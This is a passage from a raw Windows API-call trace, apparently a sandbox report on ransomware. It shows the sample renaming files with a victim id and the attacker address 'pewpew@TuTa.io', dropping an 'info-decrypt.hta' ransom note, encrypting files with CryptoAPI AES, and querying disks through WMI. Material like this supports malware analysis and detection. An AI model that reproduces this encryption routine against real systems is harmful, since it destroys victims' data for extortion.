pType=0x36c30c4*=8, plFlavor=0x36c30c8*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c30c4*=8, plFlavor=0x36c30c8*=0) returned 0x0 [0198.789] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.789] SysStringByteLen (bstr="9C354B42") returned 0x10 [0198.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0198.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x60 [0198.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0198.789] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2fbac260, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0198.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0198.790] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0198.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0198.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0198.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0198.791] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e3de660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3de660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3de660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0198.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0198.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0198.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0198.791] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), fInfoLevelId=0x0, lpFileInformation=0x36c3698 | out: lpFileInformation=0x36c3698*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425)) returned 1 [0199.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0199.301] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0199.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0199.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0199.301] GetFileType (hFile=0x324) returned 0x1 [0199.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0199.301] GetFileType (hFile=0x324) returned 0x1 [0199.301] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x425 [0199.301] ReadFile (in: hFile=0x324, lpBuffer=0x36c3ca4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x36c3ca4*, lpNumberOfBytesRead=0x6d8edac*=0x425, lpOverlapped=0x0) returned 1 [0199.440] CloseHandle (hObject=0x324) returned 1 [0199.440] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe00b8) returned 1 [0199.441] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x374f62c | out: pbBuffer=0x374f62c) returned 1 [0199.591] CryptImportKey (in: hProv=0xbe00b8, pbData=0x366167c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f610) returned 1 [0199.591] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.591] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.591] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f1d0) returned 1 [0199.592] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.592] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x366175c*=0x1, dwFlags=0x0) returned 1 [0199.592] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x3661728, dwFlags=0x0) returned 1 [0199.592] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x366176c*, pdwDataLen=0x6d8ed78*=0x430, dwBufLen=0x430 | out: pbData=0x366176c*, pdwDataLen=0x6d8ed78*=0x430) returned 1 [0199.592] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3661bc0*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3661bc0*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0199.596] CryptDestroyKey (hKey=0xb7f610) returned 1 [0199.596] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0199.596] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0199.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpFilePart=0x0) returned 0x3d [0199.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0199.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0199.602] GetFileType (hFile=0x324) returned 0x1 [0199.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0199.603] GetFileType (hFile=0x324) returned 0x1 [0199.603] WriteFile (in: hFile=0x324, lpBuffer=0x36621c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36621c8*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0199.604] CloseHandle (hObject=0x324) returned 1 [0199.606] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0199.606] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0199.606] CoTaskMemFree (pv=0xbed438) [0199.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0199.606] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0199.606] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0199.606] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0199.606] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.608] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027590) returned 0x0 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0199.609] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027590, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6029e30) returned 0x0 [0199.609] WbemDefPath:IUnknown:Release (This=0x6027590) returned 0x0 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6029e30) returned 0x0 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0199.609] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbe2360) returned 0x0 [0199.609] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2360, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.609] WbemDefPath:IUnknown:Release (This=0xbe2360) returned 0x3 [0199.609] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0199.609] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0199.609] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0199.609] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0199.609] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0199.609] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0199.609] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0199.610] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6029e30) returned 0x0 [0199.610] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0199.610] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0199.610] WbemDefPath:IWbemPath:SetText (This=0x6029e30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0199.610] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.610] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0199.610] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0199.610] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0199.610] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.611] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027650) returned 0x0 [0199.611] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0199.611] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027650, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6029ea0) returned 0x0 [0199.611] WbemDefPath:IUnknown:Release (This=0x6027650) returned 0x0 [0199.611] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6029ea0) returned 0x0 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0199.612] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbe2550) returned 0x0 [0199.612] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2550, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0199.612] WbemDefPath:IUnknown:Release (This=0xbe2550) returned 0x3 [0199.612] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0199.612] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0199.612] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0199.612] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x1 [0199.612] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0199.612] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0199.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6029ea0) returned 0x0 [0199.612] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0199.612] WbemDefPath:IUnknown:Release (This=0x6029ea0) returned 0x2 [0199.612] WbemDefPath:IWbemPath:SetText (This=0x6029ea0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0199.612] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ea0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0199.612] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0199.612] WbemDefPath:IWbemPath:GetText (in: This=0x6029ea0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.613] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0199.613] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0199.613] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0199.613] IUnknown:Release (This=0xb51e34) returned 0x1 [0199.613] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6024aa0) returned 0x0 [0199.613] WbemLocator:IUnknown:QueryInterface (in: This=0x6024aa0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0199.614] 